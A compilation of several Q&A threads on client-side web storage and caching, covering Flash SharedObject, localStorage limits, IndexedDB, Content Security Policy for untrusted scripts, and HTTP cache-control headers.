We are in process of building conceptual model of web-based audio editor. And the first trouble we met is client-side caching system. In my opinion as server-side programmer having huge cache on client side is perfect idea, because in many cases it takes of server load by excepting multiple loading of the same data. Furthermore such cache could be good candidate for buffer for providing per-track operations, like filtering.
Our flex programmer says that this is a great trouble and it is impossible in almost any cases. But I am in great doubt, cause I know that actual Google Chrome browser version can simple keep up to 2 Gb in localStorage. Moreover I've found this example of online track-editor and looks like its caching mechanism working pretty good.
Is it possible to cache some data (smth about 100-200mb) on the client side using flash and js?
You can use SharedObject to store the data.
I am pretty sure that default size limit is too low for your needs, so your app will need to ask user to accept your new limit:
http://www.macromedia.com/support/documentation/en/flashplayer/help/help06.html
SharedObject is more reliable than the browser cache, and you control it from your app.
If you are using html5 then you can store large data on client side using html5 inbuilt database.
also refer this link
What we did when writing a video editor. Well, actually, in Flash you can save files to the user's machine, with the restriction that it must be transparent to the user (i.e. the user initiates the action, goes through the OS dialog and saves the file as they would normally save anything they download), similarly, you can load in a file from a user's computer, with the restriction that the user must initiate the action (as in by clicking with a pointing device or pressing a key).
This has certain advantages over different local storage strategies, which are mostly opaque to users (people don't usually know how to erase cookies, SharedObjects or web storage that comes with more modern browsers, but they are pretty much capable of saving and deleting the files on their system). Furthermore, all other opaque local storages may have restrictions that less savvy users might not know how to overcome / may not be possible to overcome in general - these would be size, location and ownership.
This will still be a bit of hindrance for your audience, because every time they need to save a file, they have to go through the OS's dialog, instead of doing Ctrl+S / Cmd+S / C-x C-s... But given all other options, this, IMO, leaves the user with the most choices / delivers best experience.
Another suggestion - you could, in principle, come up with a browser-based "enhanced" version of your application, which users would install as a browser plugin (if that's an editor they are using on a regular basis - why not?), in which case you wouldn't be limited to the clumsy options provided by web technologies. Chrome and Mozilla-based browsers encourage such development, however it's not standardized. Still, since these two browsers run on virtually any OS, that doesn't sound particularly as locking in your users into a certain platform...
Related
If you have a website running on any server. And the website comes in three different version: Heavy, Medium and Lite. Now you have to load lite version if clients speed is below certain limit (Lets say 500kbps), Medium version (Lets say >500kbps and <25mbps), Heavy version (Lets say more than 25mbps). Can you do it?
I was thinking making a server side script that first check the connection speed with client (don't know how), then based on the speed result redirecting them to respected website.
If there is another way, please do tell...
There is no definitive, reliable way to do this and I recommend that you focus on building an optimized site for your intended target audience and their devices.
Internet connections are pretty good around the world. The effort and ongoing maintenance in updating and managing three frontends is not feasible. Instead, focus on serving optimized content and use modern techniques to serve media targetting screen size and device. Limit unnecessary media, compile and bundle scripts, ensure servers are serving gzipped content and place your servers/cdn's near your audience.
If you did, however, want to pursue this exercise you can play with the following idea: You would need to make an initial request to the server to get a timestamp - we want to work with the server's time, not the client which could be off. The client receives the timestamp and responds immediately, passing the timestamp back to the server. The server considers the difference between the two and redirects accordingly.
The problem is that connections are not consistent, and you cannot rely on that first connection to represent the client's connection quality. There may be a dip in connection quality as they are connecting etc.
To maintain two or more server side codes is not easy or ideal. Focus on optimization especially on the website assets such as images. Images form about 75% of site load times.
Ideally you can have multiple image source to start with img srcset.
What you are talking about is obtainable with respect to images and videos . You can have more than three images and the browser will select the best based on the available connection speed.
I created a small JavaScript application for which I reused some (quite large) JavaScript resources that I downloaded from the internet.
My application runs in the browser like other interactive web applications but works entirely offline.
However, I intend to enter some private information in the application which it shall visualize. Since I cannot ultimately trust the JavaScript pieces that I downloaded, I wonder if there is a JavaScript option to make sure that no data is downloaded and, in particular, uploaded to the web.
Note that I am aware that I can cutoff the local internet connection or perhaps change browser settings or use an application firewall, but this would not be a solution that suits my needs. You may assume that the isolation of a browser instance is save, that is no other, possibly malicious, web sites can access my offline JavaScript application or the user data I enter. If there is a secure way to (automatically) review the code of the downloaded resources (e.g. because communication is possible only via a few dedicated JavaScript commands that I can search for) that would be an acceptable solution too.
You should take a look at the Content Security Policy (CSP) (see here and here). This basically blocks every connection from your browser to any other hosts, unless explicitely allowed. Be aware that not all browsers support CSP, which leads to potential security problems.
Reviewing the library code might be difficult because there are many ways to mask such code pieces.
Find it yourself by watching your browser's network activity while your application is in action.
There are more than enough tools to do this. Also, if you know how to use netstat command line tool, it is readily shipped with windows.
Here is one cool chrome extension which watches the traffic of the current tab.
https://chrome.google.com/webstore/detail/http-trace/idladlllljmbcnfninpljlkaoklggknp
And, here is another extension which can modify the selected traffic.
https://chrome.google.com/webstore/detail/tamper-chrome-extension/hifhgpdkfodlpnlmlnmhchnkepplebkb?hl=en
You can set the filters and modify all requests/responses happening in your page.
If you want to write an extension to block requests yourself, check this answer out.
I have a program where the user does some actions (i.e. clicking on several buttons). I want to record their clicks and the buttons that they click to allow the user to then download a text file with a record of their clicks when they click a separate "download" button. I looked at the File-system APIs for HTML 5, but they seemed to not have cross-browser support. I would ideally like to have this entire file generation and download scheme be entirely client-side, but I am open to server-side ideas as well.
TL;DR: Essentially I'm looking for an equivalent to Java's FileWriter, FileReader, ObjectOutputStream, and ObjectInputStream within Vanilla JS or jQuery (would like to stay away from php, but I'll use it as a last option).
Also, why don't all browsers support the filesystem api? (I'm guessing that it would make MSWord and Pages go out of business with all the open source clientside text editors that could come out.)
Unfortunately the HTML5-File-system is no longer a part of the spec, long story short FF refused to implement because they claimed everything you could do in the File-System API was doable in the HTML5 Indexeddb (which was mostly true). Please see this blog post for more on why FF didn't implement. I do not know IE's story. (I may have exagerated why FireFox didn't implement, I'm still bummed because you cannot actually do everything in indexeddb that you can do in the noew "Chrome File-system API")
Typically if two of those three browsers implement a spec, it stays in the spec. Otherwise that spec gets orphaned. However, I'm fairly certain a large reason the file-system api didn't take off is because of the IndexedDB API (caniuse IndexedDB) really took off when both specs were introduced. If you want cross browser support, check this api out.
That all said if you are still set on the file-system api some developers wrote a nice wrapper around the IndexedDB, the File-system api wouldn't actually supply you with a stream anyway. You would have to keep appending events to a given file given a fileWriter object. you'd then have to read the entire file and send to the server via an ajax request and then downloaded from the server once successfully uploaded.
The better route would be to use the IndexedDB apiwhich as stated on developer.mozilla
Open a database.
Create an object store in upgrading database.
Start a transaction and make a request to do some database operation, like adding or retrieving data.
Wait for the operation to complete by listening to the right kind of DOM event.
Do something
with the results (which can be found on the request object).
Here are a couple tutorials on the IndexedDB.
https://developer.mozilla.org/en-US/docs/Web/API/IndexedDB_API/Using_IndexedDB
http://www.html5rocks.com/en/tutorials/indexeddb/todo/
As for giving the user that file, as mentioned briefly before you would have to upload the file to the server and download upon the "download" request. Unfortunately you have to trick the user into giving them the data already on their machine. Anyway, hope this all helps.
I am using the localStorage in this demo here,
http://help.arcgis.com/en/webapi/javascript/arcgis/demos/exp/exp_webstorage.html
Basically it is a mapping application which caches map tiles in the localStorage.
I quite quickly reach the 5MB limit and from then onwards I get errors, QUOTA_EXCEEDED_ERR.
How can I extend the localStorage? Or what other options do I have to store data on the client side in HTML5, has anybody used the indexdDB, does it work in chrome?
http://www.w3.org/TR/IndexedDB/
And of course the web database specification has been deprecated so I would like to avoid that,
http://www.w3.org/TR/webdatabase/
My understanding is that the user can extend localstorage but the website can't (by design). You simply need to catch the error in Javascript and show the user a dialog requesting they increase their storage limit - preferably providing some instructions for major browsers.
EDIT: Perhaps not so simple. It seems some browsers don't allow the user to increase the storage size. Google seems convinced the localStorage API doesn't scale well to large files and developers should consider IndexedDB instead.
Currently browsers have incomplete caching implementation. It only allows to set expiration or keep immediate expiration. Important 3rd option to expire cache programmatically is missing. Without that 3rd option developers cannot deploy new version of code efficiently and reliably.
If they use 2nd option it is inefficient if they have framework of many small files. Combining many small files into one is not efficient because any small change will cause whole framework to be deployed instead of one single file.
If they use 1st option updates will not get to user until cache expiration which creates compatibility problems between server side code and client side code and potentially between different parts of client side code. Setting expiration requires prediction of future deployment, which is inconvenient and will disallow quick bug fixes.
When people ask about that problem, some suggest to use version numbers or other temporary ids to trick browser cache by loading unique URLs. The problem with it is that it puts unnecessary overhead on network and local file system to load and store unnecessary old versions and tons of unique URLs. It almost defeats the purpose of caching by URL.
The right solution is to allow programmer of a web site to clean cache of files that came only from that web site. That way list of updated files could be requested and cache of newer files would be cleaned to allow browser to load fresh versions.
Proper caching mechanism is simple and powerful pattern that could boost all web client-side development to new levels, I only wonder why browser producers did not implement it yet.
Hehe, well, as far as us developers are concerned, of course!
On the other hand, cache is there to facilitate the user's experience in terms of responsiveness. It is our responsibility to work-around all these nuisances and protect the user in a shell of ignorance and all-is-wellness.
I do not think it is this easy. One problem I can see is that it is not just the browser cache. your files can be cached in many places along the way from your server to the browser (clients). Some of the browsers can still use the old version, and the answer to the question which one is cleared and what version is supposed to go to this particular client becomes really uncertain really fast.
It's an interesting idea, but how would the browser know when to ask your website if it should clear the cache? Every time the page is loaded? Wouldn't that partially defeat the purpose of caching? Set reasonable cache expiration intervals, and schedule your updates to match those, and it should be ok as it is.
I don't think what you suggest is necessary or desirable.
The client-side cache should be controlled by the user, not by you (the data/code provider). If the user wants a better way to manage his "Temporary Internet Files", then that's up to the browser developers, but I think you should not have a say in how it is managed.
For all intents and purposes, you only need to say, "this data/code is usable until X date", "this data/code is usable until Y version", or "it's never usable again".
Excellent cache control strategies can already be setup by using the existing HTTP headers (Cache-Control, ETag, etc.). If you want something to be "forced" to be refreshed, you can always add a querystring with the date on it. This is not really a hack, as you suggest, because you are saying, "get me the version of the file as of this date"... and your server has all the freedom in the world to refresh the caching policy: return "302 redirect" to the non-querystring version, or send down new headers, etc.
Edit:
I can refine my idea from above:
You can use a path or querystring to identify the "current" version:
http://somedomain.com/somepath/current/yourfile.js
The "current" URL can be setup to give a 302 redirect to a particular version of yourfile.js, while also telling the browser never to cache the current version:
302 Moved Temporarily
Location: /somepath/v3.2.3/yourfile.js
Cache-Control: no-cache;
This allows your "loader" HTML to include Javascript that decides to use a certain version:
<script type="text/javascript">
<%php
if($action == "clearCache") {
print "var version = 'current';";
} else {
print "var version = '" . $version . "';";
}
%>
</script>
they theorically do, with cache params in the header section and meta parameters
(google meta no-cache, PHP/ASP no-cache)
like cache-expires, the date that should expire etc
I agree that this is weird in most, if not all, browsers.
sometimes it works, sometimes it doesn't or takes more time to clear the cache for some reason
but would be nice to have that option in the script, like a javascript or something directly on the tags, like img src="blah.jpg" expires="my_blah_last_edited"
it could be better, true
I imagine there are great security concerns. You have anonymous and remote web-pages telling local a client to delete files on the client machine - this has all sorts of potential for disaster. Would you trust IE to do this? It just sounds too risky. There's a big difference between a directive to not cache something in the first place and a directive to delete something already in existence from the cache.
Why not embed some kind of unique tag or timestamp in the image etc. uri for each deployment, thereby causing the browser to reload?
there should be a javascript or jquery which tell the browser that content hasbeen changed and download it again even the url of content is same..